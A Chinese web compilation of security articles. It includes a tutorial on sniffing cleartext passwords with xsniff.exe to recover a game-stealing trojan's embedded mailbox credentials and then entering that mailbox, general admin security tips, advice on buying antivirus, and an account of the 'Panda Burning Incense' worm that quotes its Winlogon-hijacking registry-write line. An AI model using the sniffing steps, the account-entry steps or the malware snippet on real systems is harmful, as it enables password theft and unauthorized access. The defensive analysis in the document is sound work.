　　前一阵子，在论坛里看到一人，介绍他的盗QQ、游戏密码的木马，只要设置好E-mail的用户名及该E-mail的密码，就可以盗号了。是否知道这个木马是包含后门的?在你用它来帮你盗号的同时，盗取的用户名及密码也都会发送给木马作者一份，而我们就是要利用嗅探工具来得到这个木马作者所用E-mail的用户名及密码。然后，来个“为民除害”。最后希望大家不要使用木马，不然害人的同时还会害己(有些木马还会盗取你的账号及密码)。

　　下面就以一款针对某网络游戏的木马来做分析，来看看如何得到木马中的一些“隐藏”信息。首先要准备的一些必要的工具：

　　①下载我们所需要的嗅探工具，解压后得到xsniff.exe;

　　②一个传奇木马软件，网络上有很多。

　　下面就来开始抓获这个木马中的谍中谍。

　　第一步：点击“开始→运行”，输入“CMD”(不含引号)，打开“命令提示符窗口”。

　　第二步：进入嗅探工具所在目录，输入“xsniff.exe -pass -hide -log pass.log”(不含引号)，这样局域网里的明文密码(包括本机)都会被记录到pass.log中。

　　第三步：下面打开该网游的木马，输入你的邮箱地址，点击发送测试邮件的按钮，显示发送成功后，再打开生成的pass.log文件(括号内的文字为注释，并不包含在pass.log文件中)：

　　TCP [04/08/04 19:14:10] 61.187.***.160->202.102.***.114 Port: 1140->25 (前面的IP是发信人的IP地址，后面的IP是接收方的IP地址，PORT是指端口) USER: ZXhlY3V0YW50[admin] (USER是信箱用户名，前面的ZXhlY3V0YW50为加密的数据，后面[]内的为用户ID) TCP [04/08/04 19:14:10] 61.187.***.160->202.102.***.114 Port: 1140->25 PASS: YWRtaW5zdXA=[adminsup] (PASS是邮箱的密码，YWRtaW5zdXA=为加密数据，后面[]内的为密码) TCP [04/08/04 19:14:10] 61.187.***.160->202.102.***.114 Port: 1140->25 MAIL FROM: (类似于发邮件时的信息，指信息发送的目的邮箱) TCP [04/08/04 19:14:10] 61.187.***.160->202.102.***.114 Port: 1140->25 RCPT T (测试信箱的地址)

　　第四步：现在我们已经知道了这个木马是使用admin@1234.***邮箱来发信的，用户名是admin，密码是adminsup。于是，进入这个邮箱，删掉那些信吧。

　　第五步：不要以为这就结束了，木马是狡猾的，很多木马还包含一个隐藏后门。执行刚刚生成的木马服务器端(没有手动清理病毒能力的读者请勿轻易尝试，并对系统进行备份，以便还原)。

　　第六步：使用前面的命令，让xsniff开始嗅探，进入该游戏，随便申请一个ID，接着退出，再去看看pass.log文件。

　　TCP [04/08/04 19:20:39] 61.187.***.160->61.135.***.125 Port: 1157->25 PASS: YWRtaW5zdXA=[admin] TCP [04/08/04 19:20:40] 61.187.***.160->61.135.***.125 Port: 1157->25 MAIL FROM:

　　看到了吗?木马终于漏出了狐狸尾巴，用户名为admin，密码为admin，邮箱是为admin@12345.***，这个邮箱才是作者的后门程序，木马真正的后门。

　　第七步：最后，将该邮箱里的盗号邮件清除，然后恢复系统。

让系统更安全 网管必知十四大安全策略

让系统更安全 网管必知十四大安全策略

出处： 天极博客

　　最近，各大软件纷纷爆出比较严重的安全漏洞：微软Word 2000的“零时间”攻击漏洞，Adobe的PDF后门，Flash Player的拒绝服务式攻击等等。在用户面临漏洞的时候慌乱失措的时候，更忙更乱的也许就是我们那些公司和企业的网络管理员了。因为一台电脑被攻破，也许就意味着整个网络的失陷。

　　不需要昂贵的、复杂的安全系统;仅仅是一些简单的检查和管理就能发挥很高的效用。

　　1、避免安装或运行未经认证的不明软件或内容。了解电脑上正在运行哪些程序以及它们为什么运行。如果你不知道你的系统上都有什么，你就不能充分对你的系统进行保护。

　　2、不要让非管理员用户以系统管理员或者根权限身份登录。

　　3、保护你的e-mail。将所有进入的HTML内容转换为普通文本格式，阻止所有文件默认文件扩展，除了少数你希望允许通过的。

　　4、保护你的密码。设置较长的密码，普通用户来说，以10个字符或更长为佳，系统管理帐户为15个字符或更长为佳。执行帐户锁定，甚哪怕就只是一分钟的。在Windows系统里，禁用LM密码hash。在Unix/Linux下，使用较新的crypt(3)hash，MD5类型hash，或者如果你的操作系统支持的话，选择更好的bcrypt hash。

　　5、尽可能地使用默认禁用和最小化权限。当执行最小化权限的安全策略的时候，使用基于规则的安全。你应当一个IT规则一个组，而不是只有一个“IT安全组”。

　　6、定义和加强安全域。谁需要访问什么?什么类型的通信连接是合法的?回答这些问题然后设计周边防御。定义基准值，记录反常的通信量。

　　7、在可能的情况下加密所有的机密数据，特别是在便携式电脑和存储设备上。没有任何借口偷这个懒--你因丢失的数据而恶化的公共关系就可以说明一切了(当然，你可以看看AT&T，Veteran Affair美国部门，美国银行的下场)。

　　8、操作系统和所有程序的升级补丁管理。自我一下，你最近有没有升级你的Macromedia Flash，Real Player，和Adobe Acrobat呢?

　　9、尽可能地在网关和主机上装配反病毒、反垃圾邮件和反间谍套件。

　　10、模糊化地设置安全信息。重命名你的管理员和根权限帐户。不要以ExchangeAdmin来命名一个帐号。不要将你的文件服务器命名为如FS1，Exchange1或者GatewaySrv1登。在条件允许时将服务置于非默认端口：比如，你可以为内部用户和商业伙伴将SSH服务移到30456端口，RDP到30389，HTTP到30080等等。

　　11、在你的网络上扫描并调查未知TCP或者UDP端口监听。

　　12、跟踪记录每个用户在Internet上所浏览的区域和时间。将结果置于一个人人都可以接触到的实时在线报告中。这个建议就是使用户对自己互联网冲浪习惯进行自我管理(我敢打赌，这样同样会带来生产力上的突然提高)。

　　13、自动化安全策略。如果你不设为自动的话，它将处于一个不和谐的状态。

　　14、对全体雇员进行有关信息安全的教育，并制定合适的策略和程序。习惯于变化的和结构化的管理。对于不依从者经行严厉处罚。

　　总结

　　我知道以上的建议并不完全，还应考虑物理安全等，但这已经是个不错的开始了。选择一个建议并专注地将它从头到尾完成。然后再开始另一个。跳过那些你不能完成的，集中到你所能完成的建议上去。如果你确实必需昂贵的IDS，就去买吧--但先完成这些基础的工作吧。

留心网络版杀毒软件采购常见的三大误区

出处： 天极博客

　　企业要想采购买到物有所值的网络版，只看“价格”、“品牌”是远远不够的，必须从“成本”、“服务”、“管理”角度出发去考量。下面笔者就详细分析一下，企业在采购网络版中存在的几个误区。

　　如今，病毒傍上了网络，无论是传播速度、扩散方式，还是破坏目标，都在发生着翻天覆地的变化。在应对病毒这场战役中，企业中的电脑是各自为营，还是联合起来一致对外?更多企业显然选择了后者，而网络版无疑是最佳武器之一。只是，在采购网络版的过程中，很多企业还没有把握要领。

　　下面笔者就详细分析一下，企业在采购网络版中存在的几个误区。

　　误区一：只看价格不问成本

　　要想采购买到物有所值的网络版，只看“价格”是远远不够的，必须从“成本”角度出发去考量。

　　目前，杀毒软件无论是单机版还是网络版，价格都被压得越来越低。在卓越网上，某品牌的产品曾一度出现了3折的低价格，其他单机版杀毒软件的价格也都低于5折。

　　以前很少听到打折消息的网络版也开始了“价格战”。很多杀毒厂商都推出过“特价”产品，平均到每个客户端，其价格绝对比单独购买单机版杀毒软件低的多。在单客户端价格低廉，又兼具管理特性的诱惑下，正在为网络防毒发愁的中小企业无疑眼前一亮。

　　不过，正所谓“一分钱一分货”，通常情况下，一些低价的网络版还是存在一些“先天不足”的。比如，比起面向大众性用户的网络版防毒软件，很多低价网络版产品的管理功能都极度缩水，对客户端的控制手段几乎为零，根本无法发挥出网络版的真正威力。

　　另外，我们还不得不考虑网络版本身的维护成本。通常，网络版需要安装的一台专门的服务器上，这台防毒服务器本身也需要不断加固，必须配备必要的安全防护设施，才能保证网络版的正常运行。这些也是笔不小的投资。

　　如果产品本身发挥不出网络版的优势，还需要我们花大价钱去维护，就有些得不偿失。

误区二：只看品牌不问服务

　　品牌效应，是一个任何商家都不能忽略的内容，也是用户采购产品的重要参考指标。但是，品牌不等于服务，而服务才是产品及时发挥作用的根本。

　　目前来看，依然坚守在防毒领域的安全厂商，只有十几家厂商，也都经受了严峻的市场考验。如果一定要给他们排排座次，也不是不可能。只是，无论是以杀毒性能、产品易用性为标准，还是以病毒库规模及升级速度、未知病毒抵抗能力为标准，都会得出不同的次序。其实，真没有必要太看重“品牌”。

　　所谓“寸有所长，尺有所短”，目前看没有一个防病毒厂商能够垄断市场，也就足以说明大家各有所长，我们只要好好挑“服务”足以。

　　很多安全厂商在说到自己的实力时，会突出强调病毒库的升级速度。比如，有的厂商一小时提供一次病毒库升级服务，有的可能一天提供三次。但这并不能说明根本问题。

　　因为各个安全厂商所设置的病毒监控点不同，重点监视的地理位置也不同，病毒特征库所收入的病毒也不完全相同。也就是说，对于同一个病毒，厂商病毒库升级的速度快并不等同于会比其他家产品更早地防范该病毒。据称，某防病毒厂商曾做过试验，从自己的病毒特征库里随机抽取出300个最近一两年爆发的病毒，分别用另外三家国内外知名的防病毒产品去检测，所能查杀的病毒数量分别为180、148和111，这足以说明问题了。

　　对于那些全球范围内爆发的利用漏洞疯狂传播的大病毒，比如当初的冲击波、震荡波，也不是只靠网络版就能够真正解决的。

　　所以，在考察“品牌”的同时，我们不妨看得再实际些，看看厂商实际能够给我们提供什么样的服务。比如，是否设有24小时技术支持电话，是否在重点城市都有售后服务队伍帮助我们解决疑难问题等等。

误区三：只看杀毒不问管理

　　网络版和单机版的杀毒机理是相同的，所以价格会有高低之分，就因为网络版可以实施全网统一的安全策略，大大减轻网络管理者的维护量，从而有效避免安全“短板”扰乱大局。

　　很多人考察网络版时，都会特别关注产品的杀毒能力，而忽略了来自管理维护的消耗。要想避免“买椟还珠”，不妨从以下几方面详加考察：

　　(1)体系架构。这项指标决定了网络版的部署难度。通常情况下，网络版的体系不外乎C/S、B/S、C/S+B/S几种架构。C/S架构在部署含有跨网段和跨广域网的客户端方面存在问题，B/S架构的兼容性和可扩展性不错，而C/S+B/S架构则可以兼顾中小网络和跨地域的大型网络，兼容性和可扩展性均表现优异。如果选择，关键就要看您的网络环境了。

　　(2)安装方式。目前，网络版提供的安装方式主要是Web安装、远程安装和脚本安装以及光盘安装等几种，但并不是每款产品都有这些功能，同样要与您的具体使用环境相结合。

　　(3)管理方式。如果网路版提供基于Web的管理控制台和方便的分级管理能力，可以大大降低网络管理者的管理难度。

　　(4)漏洞扫描。因为利用系统漏洞传播和进行攻击的恶意代码越来越多，漏洞扫描功能成为企业级用户的迫切需求。不过，尽管许多网络版都具备该功能，但大多数只是提醒用户该打何种补丁了，很少会在发出警告后还去监督客户端是否修补了这些漏洞。如果碰到能自始至终消灭“漏洞”的网络版，千万不要轻易放弃啊。

病毒查杀：实例讲解如何干掉“熊猫烧香”

病毒查杀：实例讲解如何干掉“熊猫烧香”
熊猫烧香病毒nvscv32.exe变种手动清除方案

预防第一！熊猫烧香病毒的预防方法

熊猫烧香病毒专杀及手动修复方案 v1.1

熊猫烧香病毒完整解决方案 新增查杀、修复文件工具

为你支招　预防“熊猫烧香”系列病毒

警惕！某IT网站被植入“熊猫烧香”

熊猫烧香变种 spoclsv.exe 解决方案

你中过熊猫烧香么?!看到过熊猫拿着三支香的样子么!?中招后如何处理!?看完本文，你将学会如何从计算机中杀掉“熊猫烧香”。

　　惊险查杀过程　　

1.熊猫烧香病毒：图片就是个熊猫在烧香感觉蛮可爱的!当时并没有很在意!第二天再次打开电脑的时候!几乎电脑所有的EXE文件都成了熊猫烧香图片!这时才有所感觉!

　　部分EXE文件已经无法正常使用!新加一个AUTORUN.INF的文件!

　　当初不明白这个文件的作用!在网上查了一些资料表明。才知道。只要用户打开盘符。就会运行这个病毒!用杀毒软件杀毒!没有效果!看来现在的杀毒软件越来越不行了~..

　　2.想用组合键打开任务管理器!无法打开~失败....想看看注册表有没什么情况。依然失败!奇怪的是：电脑运行正常。也都不卡!难道不是病毒.是系统出了问题?从网上下了第三方工具查看进程!果然看到两个可疑进程!FuckJacks.exe貌似是最可疑的不敢贸然终止!赶快问问白度大叔!　　3.大叔告诉我。是熊猫病毒的进程!一切正如我意!懒的装系统了!

　　4.先结束FuckJacks.exe进程!开始-运行-CMD 输入：ntsd -c q -p 病毒的PID~终于KILL掉了!一切恢复正常了!兴奋ING...赶快打开注册表

　　突然注册表又关了.看看进程FuckJacks.exe。又出现了~~那应该它还有个守护进程!找找找。无发现....奇怪了。难道他的守护进程插入到系统进程了?不会吧.....头疼一阵...。

　　5.算了，去向朋友找个专杀工具。有一个朋友说他写过熊猫的专杀工具!晕~~原来牛人在我身边。我都没发现~赶快想他请教~~才大概的了解了熊猫烧香~ 叫他给了我一个无壳的熊猫自己分析下~(自己动手.丰衣足食嘛~~)

　　6.用UI32打开熊猫.看到了条用的部分资源!文件执行后。释放到\system32\FuckJacks.exe下。

　　7.继续象下可以看到熊猫的一些传播过程相当的经典..有扫描同一网段的电脑~自我复制.等等相当强大公能~同时感染所有盘符的EXE文件~却不对一些重要的系统文件和常用文件进行感染!可见并不想早成太大破坏~修改注册表.禁止打开注册表.甚至禁用了部分服务~~

　　8下面就是重要的时刻了!从后面的代码可以看出!病毒的作者是个非常出色的程序员!有非常好的编程习惯!对病毒的异常运行~进行了很好的定义~都很大段都是作者对病毒运行条件的判断定义~值得注意的一点：在感染EXE文件的同时!感染ASP。HTML文件。会在最后加一段类似挂马的基本代码.~~做到通过第三方尽快传播的办法~(如果被感染者是网站管理人员。后果可想而知了)病毒程序的运行

　　在给大家说下病毒的部分运行实现!简单的修改注册表：

　　有这样一句：WSHELL.REGWIRTE MYREGKEY， MYREGVALUE， MY REGTYPE　　第一个是参数的键名：完整路径..　　第二个是：键值。。　　第三个是：键的类型，　　Set wshell=wscript.createobject("wscript.shell")　　wshell.regWrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows NT\CurrentVersion\Winlogin\shell","eseplorer.exe","REG_SZ"

　　这就是脚本病毒掼用技术~通用的解决方法

　　1、就是要关闭自己的默认共享。

　　首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把　　RestrictAnonymous = DWORD的键值改为：00000001。　　restrictanonymous REG_DWORD

　　0x0 缺省　　0x1 匿名用户无法列举本机用户列表　　0x2 匿名用户无法连接本机IPC

　　说明:不建议使用2，否则可能会造成你的一些服务无法启动，如SQL Server

　　2、禁止默认共享

　　1)察看本地共享资源

　　运行-cmd-输入net share

　　2)删除共享(每次输入一个)

　　net share ipc$ /delete　　net share admin$ /delete　　net share c$ /delete　　net share d$ /delete(如果有e,f,……可以继续删除)

　　3)修改注册表删除共享　　运行-regedit　　找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]　　把AutoShareServer(DWORD)的键值改为0000000。

　　如果上面所说的主键不存在，就新建(右击-新建-双字节值)一个主健再改键值。

　　我们看看这个病毒功能： 瞬间复制整个硬盘、有监视QQ记录的功能、网吧的电脑依然有效!显然有了精灵的转存功能。值得注意的功能：删除GHOST的功能，控制电脑进行集体的DDOS，更出现了KILL掉KV、瑞星和金山的功能!　

　病毒的特性：网页传播!电脑的弱口令。默认共享传播!在内网的传播速度非常的快!对企业的居于网有很大的杀伤力!病毒瞬间复制整个硬盘。占用内存极小~

　　熊猫这款病毒虽然不是很新鲜。但是病毒的作者真的很让人佩服~完全的网络高手!超强的优秀程序员!

　　忘说了：网络巡警的熊猫专杀工具。就可以杀最新的变种!